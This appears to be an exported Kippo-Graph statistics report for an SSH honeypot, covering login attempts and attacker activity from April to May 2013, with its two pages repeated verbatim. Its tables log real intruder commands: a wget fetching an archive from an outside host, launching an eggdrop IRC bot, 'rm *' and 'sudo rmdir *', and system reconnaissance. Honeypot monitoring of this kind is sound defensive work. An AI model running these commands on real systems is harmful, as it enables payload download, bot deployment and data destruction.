SSH Honeypot statistics 18-05-2013

Page 1

Source website: bruteforce.gr/kippo-graph

Overall honeypot activity Total login attempts

23891

Distinct source IP addresses

191

Active time period Start date (first attack) Tuesday, 09-Apr-2013, 20:22 PM

End date (last attack) Saturday, 18-May-2013, 07:37 AM

Graphical statistics generated from your Kippo honeypot database

Top 10 passwords This vertical bar chart diplays the top 10 passwords that attackers try when attacking the system.

Top 10 usernames This vertical bar chart diplays the top 10 usernames that attackers try when attacking the system.

Top 10 user-pass combos This vertical bar chart diplays the top 10 username and password combinations that attackers try when attacking the system.


This pie chart diplays the top 10 username and password combinations that attackers try when attacking the system.

Success ratio This vertical bar chart diplays the overall attack success ratio for the particular honeypot system.

Successes per day/week This vertical bar chart diplays the most successful break-ins per day (Top 20) for the particular honeypot system. The numbers indicate how many times correct credentials were given by attackers.


This line chart diplays the daily successes on the honeypot system. Spikes indicate successful entries over a weekly period. Warning: Dates with zero successes are not displayed.

This line chart diplays the weekly successes on the honeypot system. Curves indicate successful entries over a weekly period.

Connections per IP This vertical bar chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.


This pie chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.

Successful logins from the same IP This vertical bar chart diplays the number of successful logins from the same IP address (Top 20). The numbers indicate how many times the particular source opened a successful session.

Probes per day/week This horizontal bar chart diplays the most probes per day (Top 20) against the honeypot system.


This line chart diplays the daily activity on the honeypot system. Spikes indicate hacking attempts. Warning: Dates with zero probes are not displayed.

This line chart diplays the weekly activity on the honeypot system. Curves indicate hacking attempts over a weekly period.

Top 10 SSH clients This vertical bar chart diplays the top 10 SSH clients used by attackers during their hacking attempts.


Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph

Thanks to OS Templates


Source website: bruteforce.gr/kippo-graph

Input presentation and statistics gathered from the honeypot system Overall post-compromise activity Post-compromise human activity Total number of commands 161

Distinct number of commands 82 Downloaded files

Total number of downloads 1

Distinct number of downloads 1

Human activity inside the honeypot The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.

The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation. Warning: Dates with zero input are not displayed.

The following line chart visualizes real human activity per week, by counting the number of input to the system for each day of operation.


Top 10 input (overall) The following table diplays the top 10 commands (overall) entered by attackers in the honeypot system. ID

Input

Count

1

ls

28

2

cd ..

11

3

exit

9

4

ls -l

6

5

ifconfig

5

6

w

3

7

ls -a

3

8

poweroff -h

3

9

poweroff

3

10

top

3

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.

Top 10 successful input The following table diplays the top 10 successful commands entered by attackers in the honeypot system. ID

Input (success)

Count

1

ls

28

2

cd ..

11

3

exit

9

4

ls -l

6

5

ifconfig

5

6

w

3

7

ls -a

3

8

mkdir TEST

2

9

cd richard/

2


10

rm *

2

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.

Top 10 failed input The following table diplays the top 10 failed commands entered by attackers in the honeypot system. ID

Input (fail)

Count

1

poweroff -h

3

2

poweroff

3

3

top

3

4

dir

3

5

help

2

6

sudo rmdir *

2

7

locate

2

8

test

1

9

halt -h

1

10

halt -n

1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.

passwd commands The following table diplays the latest "passwd" commands entered by attackers in the honeypot system. ID

Timestamp

Input

1

Saturday, 11-May-2013, 23:43 PM

h2ckt3ch

2

Wednesday, 24-Apr-2013, 09:11 AM

tst

3

Wednesday, 24-Apr-2013, 09:11 AM

test

wget commands


The following table diplays the latest "wget" commands entered by attackers in the honeypot system. ID 1

Input

File link

wget rom.do.am/enou.tgz

NoVirusThanks

http://anonym.to/?http://rom.do.am/enou.tgz

Scan File

Executed scripts The following table diplays the latest executed scripts by attackers in the honeypot system. ID 1

Timestamp Monday, 06-May-2013, 17:06 PM

Input ./eggdrop-1.6.17 -m bot1.conf

Interesting commands The following table diplays other interesting commands executed by attackers in the honeypot system. ID

Timestamp

Input

1

Friday, 17-May-2013, 20:19 PM

locate

2

Monday, 06-May-2013, 17:06 PM

cat /proc/cpuinfo

3

Wednesday, 01-May-2013, 12:16 PM

cat /etc/issue

4

Wednesday, 24-Apr-2013, 20:26 PM

ifconfig

Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph

Thanks to OS Templates


Source website: bruteforce.gr/kippo-graph

Overall honeypot activity Total login attempts

23891

Distinct source IP addresses

191

Active time period Start date (first attack) Tuesday, 09-Apr-2013, 20:22 PM

End date (last attack) Saturday, 18-May-2013, 07:37 AM

Graphical statistics generated from your Kippo honeypot database

Top 10 passwords This vertical bar chart diplays the top 10 passwords that attackers try when attacking the system.

Top 10 usernames This vertical bar chart diplays the top 10 usernames that attackers try when attacking the system.

Top 10 user-pass combos This vertical bar chart diplays the top 10 username and password combinations that attackers try when attacking the system.


This pie chart diplays the top 10 username and password combinations that attackers try when attacking the system.

Success ratio This vertical bar chart diplays the overall attack success ratio for the particular honeypot system.

Successes per day/week This vertical bar chart diplays the most successful break-ins per day (Top 20) for the particular honeypot system. The numbers indicate how many times correct credentials were given by attackers.


This line chart diplays the daily successes on the honeypot system. Spikes indicate successful entries over a weekly period. Warning: Dates with zero successes are not displayed.

This line chart diplays the weekly successes on the honeypot system. Curves indicate successful entries over a weekly period.

Connections per IP This vertical bar chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.


This pie chart diplays the top 10 unique IPs ordered by the number of overall connections to the system.

Successful logins from the same IP This vertical bar chart diplays the number of successful logins from the same IP address (Top 20). The numbers indicate how many times the particular source opened a successful session.

Probes per day/week This horizontal bar chart diplays the most probes per day (Top 20) against the honeypot system.


This line chart diplays the daily activity on the honeypot system. Spikes indicate hacking attempts. Warning: Dates with zero probes are not displayed.

This line chart diplays the weekly activity on the honeypot system. Curves indicate hacking attempts over a weekly period.

Top 10 SSH clients This vertical bar chart diplays the top 10 SSH clients used by attackers during their hacking attempts.


Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph

Thanks to OS Templates


Source website: bruteforce.gr/kippo-graph

Input presentation and statistics gathered from the honeypot system Overall post-compromise activity Post-compromise human activity Total number of commands 161

Distinct number of commands 82 Downloaded files

Total number of downloads 1

Distinct number of downloads 1

Human activity inside the honeypot The following vertical bar chart visualizes the top 20 busiest days of real human activity, by counting the number of input to the system.

The following line chart visualizes real human activity per day, by counting the number of input to the system for each day of operation. Warning: Dates with zero input are not displayed.

The following line chart visualizes real human activity per week, by counting the number of input to the system for each day of operation.


Top 10 input (overall) The following table diplays the top 10 commands (overall) entered by attackers in the honeypot system. ID

Input

Count

1

ls

28

2

cd ..

11

3

exit

9

4

ls -l

6

5

ifconfig

5

6

w

3

7

ls -a

3

8

poweroff -h

3

9

poweroff

3

10

top

3

This vertical bar chart visualizes the top 10 commands (overall) entered by attackers in the honeypot system.

Top 10 successful input The following table diplays the top 10 successful commands entered by attackers in the honeypot system. ID

Input (success)

Count

1

ls

28

2

cd ..

11

3

exit

9

4

ls -l

6

5

ifconfig

5

6

w

3

7

ls -a

3

8

mkdir TEST

2

9

cd richard/

2


10

rm *

2

This vertical bar chart visualizes the top 10 successful commands entered by attackers in the honeypot system.

Top 10 failed input The following table diplays the top 10 failed commands entered by attackers in the honeypot system. ID

Input (fail)

Count

1

poweroff -h

3

2

poweroff

3

3

top

3

4

dir

3

5

help

2

6

sudo rmdir *

2

7

locate

2

8

test

1

9

halt -h

1

10

halt -n

1

This vertical bar chart visualizes the top 10 failed commands entered by attackers in the honeypot system.

passwd commands The following table diplays the latest "passwd" commands entered by attackers in the honeypot system. ID

Timestamp

Input

1

Saturday, 11-May-2013, 23:43 PM

h2ckt3ch

2

Wednesday, 24-Apr-2013, 09:11 AM

tst

3

Wednesday, 24-Apr-2013, 09:11 AM

test

wget commands


The following table diplays the latest "wget" commands entered by attackers in the honeypot system. ID 1

Input

File link

wget rom.do.am/enou.tgz

NoVirusThanks

http://anonym.to/?http://rom.do.am/enou.tgz

Scan File

Executed scripts The following table diplays the latest executed scripts by attackers in the honeypot system. ID 1

Timestamp Monday, 06-May-2013, 17:06 PM

Input ./eggdrop-1.6.17 -m bot1.conf

Interesting commands The following table diplays other interesting commands executed by attackers in the honeypot system. ID

Timestamp

Input

1

Friday, 17-May-2013, 20:19 PM

locate

2

Monday, 06-May-2013, 17:06 PM

cat /proc/cpuinfo

3

Wednesday, 01-May-2013, 12:16 PM

cat /etc/issue

4

Wednesday, 24-Apr-2013, 20:26 PM

ifconfig

Copyright Š 2011, 2012 - All Rights Reserved - Kippo-Graph

Thanks to OS Templates


Issuu converts static files into: digital portfolios, online yearbooks, online catalogs, digital photo albums and more. Sign up and create your flipbook.